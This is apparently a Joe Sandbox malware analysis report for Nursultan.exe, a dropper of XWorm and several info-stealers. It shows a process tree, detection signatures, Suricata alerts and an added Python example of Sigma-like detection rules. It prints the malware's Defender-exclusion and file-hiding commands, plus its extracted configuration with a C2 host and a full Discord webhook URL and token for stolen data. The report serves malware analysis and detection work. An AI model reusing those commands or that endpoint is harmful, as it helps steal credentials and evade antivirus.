
Windows Analysis Report
Nursultan.exe

Overview

General Information

Sample name: Nursultan.exe
Analysis ID: 1505919
MD5: ccfa4401df6dcaef4265f5edd06f3fde
SHA1: f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
SHA256: 366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
Tags: exe, xworm

Detection

44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected 44Caliber Stealer
Yara detected BlackGuard
Yara detected Blank Grabber
Yara detected Rags Stealer
Yara detected Umbral Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • Nursultan.exe (PID: 764 cmdline: "C:\Users\user\Desktop\Nursultan.exe" MD5: CCFA4401DF6DCAEF4265F5EDD06F3FDE)
    • Nursultan.exe (PID: 2464 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
      • Nursultan2.exe (PID: 7084 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
        • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1272 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 2300 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 6580 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 7188 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • timeout.exe (PID: 7232 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
          • mode.com (PID: 7760 cmdline: mode con: cols=103 lines=21 MD5: BEA7464830980BF7C0490307DB4FC875)
        • Insidious.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
        • Microsoft Edge.exe (PID: 2924 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
        • Umbral.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
          • WMIC.exe (PID: 7368 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7892 cmdline: "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8036 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Nursultan.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
        • Nursultan2.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
          • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • cmd.exe (PID: 7632 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • cmd.exe (PID: 7640 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • chcp.com (PID: 7664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • timeout.exe (PID: 7680 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • Conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • mode.com (PID: 1868 cmdline: mode con: cols=103 lines=21 MD5: BEA7464830980BF7C0490307DB4FC875)
          • Insidious.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
          • Microsoft Edge.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
          • Umbral.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
          • Conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Nursultan.exe (PID: 576 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
          • Nursultan2.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
            • cmd.exe (PID: 7804 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 8052 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • chcp.com (PID: 3620 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • timeout.exe (PID: 432 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
            • Insidious.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
            • Microsoft Edge.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
            • Umbral.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
          • Nursultan.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
            • Nursultan2.exe (PID: 8044 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
              • cmd.exe (PID: 6152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • cmd.exe (PID: 6768 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • cmd.exe (PID: 764 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • chcp.com (PID: 576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • timeout.exe (PID: 2924 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • Insidious.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
              • Microsoft Edge.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
              • Umbral.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
            • Nursultan.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
              • Nursultan2.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
                • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • Nursultan.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
                • Conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Microsoft Edge.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
      • powershell.exe (PID: 5748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

XWorm: {"C2 url": ["stage-von.gl.at.ply.gg"], "Port": "19496", "Aes key": "234234", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
44Caliber Stealer: {"Discord Webhook": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9\u0001Spidey Bot"}
Umbral Stealer: {"C2 url": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9", "Version": "v1.3"}

Yara Overview

Dropped Files:
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | Rule: JoeSecurity_BlankGrabber | Description: Yara detected Blank Grabber | Author: Joe Security
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | Rule: JoeSecurity_UmbralStealer | Description: Yara detected Umbral Stealer | Author: Joe Security
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Description: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen | Strings:
  • 0x31f18:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x3209e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x3213a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
Source: C:\Users\user\AppData\Roaming\Microsoft Edge | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Microsoft Edge | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
(15 further entries not shown)

Memory Dumps:
Source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp | Rule: JoeSecurity_BlankGrabber | Description: Yara detected Blank Grabber | Author: Joe Security
Source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp | Rule: JoeSecurity_UmbralStealer | Description: Yara detected Umbral Stealer | Author: Joe Security
Source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_BlankGrabber | Description: Yara detected Blank Grabber | Author: Joe Security
Source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_UmbralStealer | Description: Yara detected Umbral Stealer | Author: Joe Security
Source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_RagsStealer | Description: Yara detected Rags Stealer | Author: Joe Security
(40 further entries not shown)

Unpacked PEs:
Source: 3.0.Microsoft Edge.exe.b80000.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 3.0.Microsoft Edge.exe.b80000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 3.0.Microsoft Edge.exe.b80000.0.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
  • 0xee8a:$s6: VirtualBox
  • 0xede8:$s8: Win32_ComputerSystem
  • 0x11f43:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11fe0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x120f5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10bfe:$cnc4: POST / HTTP/1.1
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
(25 further entries not shown)

Sigma Overview

System Summary

Process started, matched by 6 rules (authors: Florian Roth (Nextron Systems); Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; frack113; Florian Roth (Nextron Systems); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)):
    Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
    CommandLine|base64offset|contains: L^rbs'2
    Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
    ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
    ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe
    ProcessId: 5748, ProcessName: powershell.exe

File created, matched by 3 rules (authors: Nasreddine Bencherchali (Nextron Systems); Christopher Peacock @securepeacock, SCYTHE @scythe_io; frack113):
    EventID: 11
    Image: C:\Users\user\AppData\Local\Temp\Umbral.exe
    ProcessId: 2316
    TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr

Registry Key set, matched by 1 rule (authors: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)):
    EventID: 13, EventType: SetValue
    Image: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
    ProcessId: 3056
    TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge
    Details: C:\Users\user\AppData\Roaming\Microsoft Edge

File created, matched by 1 rule (authors: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)):
    EventID: 11
    Image: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
    ProcessId: 3056
    TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
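All of the Sigma hits above key on a handful of event fields: CommandLine and ParentImage for process creation, TargetFilename for file creation, TargetObject and Details for registry writes. The Python below is an added example, not part of the Joe Sandbox report and not the real logic of any Sigma rule named in it: it re-creates simplified forms of those conditions and runs them over Sysmon-style events constructed from this report's process tree and Sigma Data lines, plus a benign Get-MpPreference control event that must stay silent. Detection names reuse the report's Sigma and signature titles; the matching conditions, the user-writable path list and the final registry check are this example's own.

```python
"""Added example (not part of the Joe Sandbox report or of any real Sigma rule):
simplified versions of the conditions behind this report's Sigma hits, run over
Sysmon-style events constructed from the report's process tree and Data lines."""
import re

# Paths taken from the report.
PS_EXE   = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EDGE_EXE = r"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"   # XWorm, named like a browser
UMBRAL   = r"C:\Users\user\AppData\Local\Temp\Umbral.exe"
SCR_DROP = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr"
LNK_DROP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk"
RUN_KEY  = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge"

# Constructed events (EventID 1 = process create, 11 = file create, 13 = registry
# value set). The last one is a benign control that must not fire.
EVENTS = [
    {"EventID": 1, "Image": PS_EXE, "ParentImage": EDGE_EXE,
     "CommandLine": f'"{PS_EXE}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \'{EDGE_EXE}\''},
    {"EventID": 1, "Image": PS_EXE, "ParentImage": UMBRAL,
     "CommandLine": f'"powershell.exe" Add-MpPreference -ExclusionPath \'{UMBRAL}\''},
    {"EventID": 1, "Image": r"C:\Windows\System32\attrib.exe", "ParentImage": UMBRAL,
     "CommandLine": f'"attrib.exe" +h +s "{UMBRAL}"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": UMBRAL,
     "CommandLine": '"wmic.exe" csproduct get uuid'},
    {"EventID": 11, "Image": UMBRAL, "TargetFilename": SCR_DROP},
    {"EventID": 11, "Image": EDGE_EXE, "TargetFilename": LNK_DROP},
    {"EventID": 13, "Image": EDGE_EXE, "TargetObject": RUN_KEY,
     "Details": r"C:\Users\user\AppData\Roaming\Microsoft Edge"},   # dropped without an .exe extension
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'"{PS_EXE}" Get-MpPreference'},
]

# Example's own simplifications of the rule conditions (not the Sigma sources).
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|AppData\\Roaming|ProgramData|Users\\Public|Windows\\Temp)\\", re.I)
STARTUP_DIR   = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
RUN_KEY_RE    = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
EXEC_POLICY   = re.compile(r"-(ex|ep|exec|executionpolicy)\s+(bypass|unrestricted)", re.I)
SCRIPT_HOSTS  = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
EXEC_EXTS     = (".exe", ".scr", ".dll", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """EventID 1. Detection names reuse the report's Sigma/signature titles."""
    hits, low, exe = [], ev["CommandLine"].lower(), basename(ev["Image"])
    if "mppreference" in low and "-exclusion" in low:
        hits.append("Powershell Defender Exclusion")
    if EXEC_POLICY.search(low):
        hits.append("Change PowerShell Policies to an Insecure Level")
    if exe in SCRIPT_HOSTS and USER_WRITABLE.search(ev.get("ParentImage", "")):
        hits.append("Script Interpreter Execution From Suspicious Folder")
    if exe == "attrib.exe" and re.search(r"\+h\b", low) and re.search(r"\+s\b", low):
        hits.append("Uses attrib.exe to hide files")
    return hits


def check_file(ev):
    """EventID 11: writes into a Startup folder, and .scr files outside C:\\Windows."""
    hits, target = [], ev["TargetFilename"]
    if STARTUP_DIR.search(target):
        hits.append("Startup Folder File Write")
        if target.lower().endswith(EXEC_EXTS):
            hits.append("Suspicious Startup Folder Persistence")
    if target.lower().endswith(".scr") and not target.lower().startswith("c:\\windows\\"):
        hits.append("SCR File Write Event")
    return hits


def check_registry(ev):
    """EventID 13. The second condition is this example's own, not a Sigma rule."""
    hits, data = [], ev.get("Details", "")
    if RUN_KEY_RE.search(ev["TargetObject"]):
        hits.append("CurrentVersion Autorun Keys Modification")
        if USER_WRITABLE.search(data) or not data.lower().endswith(EXEC_EXTS):
            hits.append("Autorun target in user-writable path or without executable extension")
    return hits


CHECKS = {1: check_process, 11: check_file, 13: check_registry}


def scan(events):
    """One (EventID, subject, detections) tuple per event that fired anything."""
    fired = []
    for ev in events:
        hits = CHECKS.get(ev["EventID"], lambda e: [])(ev)
        if hits:
            subject = ev.get("CommandLine") or ev.get("TargetFilename") or ev.get("TargetObject")
            fired.append((ev["EventID"], subject, hits))
    return fired


if __name__ == "__main__":
    for eid, subject, hits in scan(EVENTS):
        print(f"[EventID {eid}] {subject}\n    -> {', '.join(hits)}")
```

Run as a script to print what fired. The control event makes the tuning point: Add-MpPreference from a parent in %TEMP%, combined with -ExecutionPolicy Bypass, is high confidence, while either clause on its own (an administrator adding an exclusion, a signed deployment script run with Bypass) is routine on many estates. The USER_WRITABLE list is where most of the tuning lives; extend it to whatever directories users on your estate can actually write to.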
Suricata Overview

Suricata IDS alerts:
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-09-07T01:47:50.445728+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49732        162.159.135.232  443               TCP
2024-09-07T01:48:05.148671+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49755        162.159.136.232  443               TCP
2024-09-07T01:48:19.630044+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49771        162.159.135.232  443               TCP
2024-09-07T01:48:31.749098+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49786        162.159.135.232  443               TCP
2024-09-07T01:48:44.042997+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49801        162.159.136.232  443               TCP
2024-09-07T01:48:57.245974+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49814        162.159.138.232  443               TCP
2024-09-07T01:49:11.730189+0200  2045593  1         A Network Trojan was detected  192.168.2.5  49828        162.159.137.232  443               TCP

Suricata IDS alerts with low severity:
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-09-07T01:47:46.654886+0200  2803305  3         Unknown Traffic  192.168.2.5  49731        208.95.112.1    80                TCP
2024-09-07T01:48:02.808800+0200  2803305  3         Unknown Traffic  192.168.2.5  49753        208.95.112.1    80                TCP
2024-09-07T01:48:16.913682+0200  2803305  3         Unknown Traffic  192.168.2.5  49769        208.95.112.1    80                TCP
2024-09-07T01:48:29.257120+0200  2803305  3         Unknown Traffic  192.168.2.5  49783        208.95.112.1    80                TCP
2024-09-07T01:48:41.243964+0200  2803305  3         Unknown Traffic  192.168.2.5  49798        208.95.112.1    80                TCP
2024-09-07T01:48:54.528533+0200  2803305  3         Unknown Traffic  192.168.2.5  49812        208.95.112.1    80                TCP
2024-09-07T01:49:09.463268+0200  2803305  3         Unknown Traffic  192.168.2.5  49827        208.95.112.1    80                TCP

                            AV Detection

                            Source: Nursultan.exeAvira: detected
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeAvira: detection malicious, Label: HEUR/AGEN.1307065
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\user\AppData\Roaming\Microsoft EdgeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
